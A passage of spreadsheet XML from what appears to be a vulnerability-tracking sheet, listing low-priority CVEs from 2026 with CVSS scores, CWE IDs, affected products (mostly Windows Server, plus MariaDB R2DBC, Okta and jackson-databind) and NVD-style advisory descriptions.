          <t>MariaDB Connector/R2DBC is a non-blocking MariaDB and MySQL client implemented in Java. Prior to 1.4.1, org.mariadb:r2dbc-mariadb does not gate clear-text password authentication plugins on transport encryption because the AuthenticationPlugin interface has no capability for a plugin to require a secure connection. A hostile or man-in-the-middle MariaDB server can send an AuthSwitchRequest naming mysql_clear_password or dialog (PAM) over a plain-TCP unencrypted connection, and AuthenticationFlow permits ClearPasswordPluginFlow or PamPluginFlow to return the user's password as cleartext bytes on the wire. The disclosed credentials can subsequently be used to authenticate directly to the database server. This issue is fixed in version 1.4.1.</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55860</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70091</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78620</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R409"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S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69405</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69591</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41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11" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69637</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69679</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69723</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41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4" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78629</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="R415"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S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83557</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>36c7be3b-2937-45df-85ea-ca7133ea542c</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-915</t>
        </is>
      </c>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>DefaultBaseTypeLimitingValidator is the PolymorphicTypeValidator applied automatically whenever @JsonTypeInfo is used without an explicitly configured custom validator. It denies polymorphic resolution only for a fixed set of "unsafe base types", and its isSafeSubType method returns true unconditionally for every base type outside that set. java.lang.Comparable was absent from the list despite being implemented by a very large fraction of JDK and application classes, comparable in breadth to java.io.Serializable, which is on the list for that reason. An application declaring an @JsonTypeInfo-annotated property or class with Comparable as its base type, and no custom PolymorphicTypeValidator, will accept a type identifier for essentially any class implementing Comparable. This yields an attacker-controlled object instantiation primitive; a demonstrated case constructs a java.io.File for an arbitrary attacker-chosen path, which becomes path-traversal-adjacent if the application subsequently calls path-sensitive methods on the value. No class implementing Comparable has been identified that yields code execution through deserialization alone. Global Default Typing via activateDefaultTyping is not affected, because that method structurally requires an explicit PolymorphicTypeValidator argument. This affects com.fasterxml.jackson.core:jackson-databind from 2.11.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2.</t>
        </is>
      </c>
      <c r="S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68830</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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7" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68831</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41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8" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68851</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K41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19" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69286</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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0" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69343</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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1" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69406</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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2" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69457</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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3" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69504</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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4" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
